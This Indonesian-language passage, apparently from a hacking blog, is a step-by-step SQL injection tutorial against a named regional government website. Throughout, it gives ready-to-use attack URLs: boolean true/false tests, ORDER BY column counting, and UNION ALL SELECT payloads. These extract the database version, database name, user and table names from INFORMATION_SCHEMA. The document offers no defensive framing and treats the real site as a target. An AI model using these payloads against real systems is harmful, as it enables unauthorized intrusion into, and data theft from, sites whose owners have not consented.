/var/www/sites/gunungkidulkab.go.id/gunungkidulkab.go.id/subdomains/www/html/program/publish_content.php on line 225berarti neh situs vurn3.http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+and+1=1http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+and+1=6Hasil Uji :-Pada pengecekan AND+1=1 yang dihasilkan adalah TRUE, maka halaman akan tampilsecara normal.-Pada pengecekan AND+1=6 hasilnya adalah FALSE, halaman akan menampilkan pesankesalahan (tidak berjalan normal).4. Memeriksa jumlah field dari suatu tabel. Perintah yang digunakan adalahORDER+BY+num, lakukan penambahan/increment pada variabel num. Parameternyaadalah jika field masih tersedia maka halaman akan berjalan normal, namun sebaliknya jika field tidak tersedia maka halaman akan menampilkan pesan error. Pada contoh kaliini ditemukan batas akhir field sampai pada angka 14.http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+order+by+14--Mengapa ada tanda -- diakhir perintah? Tanda -- adalah parameter komentar pada sintaks sql, bisa juga menggunakan /*. Sesuai dengan fungsinya kita akan men-setkomentar terhadap sintaks setelah klausa WHERE. Kebetulan pada contoh kasus kali ini,setelah klausa WHERE terdapat perintah sql yg lain entah itu ORDER atau LIMIT.Untuk itu digunakan parameter komentar agar perintah sql tersebut tidak dijalankansehingga kita mendapatkan pesan error jika field yang di ORDER tidak tersedia.Coba bandingkan jika parameter komentar tidak digunakan, meskipun kita melakukanORDER BY 1 dan ORDER BY 100 halaman akan tetap menampilkan pesan error. Kalaukejadiannya seperti ini dari mana kita bisa mengetahui jumlah field yang di-select??5. Mengeluarkan nomor field untuk menampilkan informasi yang diinginkan. Perintahyang digunakan adalah UNION+ALL+SELECT+no_field+no_field+.... sampai akhir :Dhttp://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=null+union+all+select+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14--6. Pada contoh kali ini, variabel id kita beri nilai null agar angka-angka yang kita deklarasikan keluar, atau bisa jugamenggunakan tanda minus (id=-870). Dari angka-angka yang tercetak pada halaman web,kita akan mengeluarkan informasi dari versi mysql, nama database dan nama user.http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=-870+union+all+select+1,2,3,4,5,concat_ws(0x2B,version(),database(),user()),7,8,9,10,11,12,13,14--7. Selanjutnya kita akan mengeluarkannama-nama tabel dengan perintahUNION+ALL+SELECT+no_field+no_field+GROUP_CONCAT(TABLE_NAME)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE(). Gunakan klausa WHERETABLE_SCHEMA=DATABASE(), agar tabel yang keluar adalah tabel dari databaseyang digunakan. Kalau Anda ingin melihat seluruh tabel dari seluruh database klausa
Leave a Comment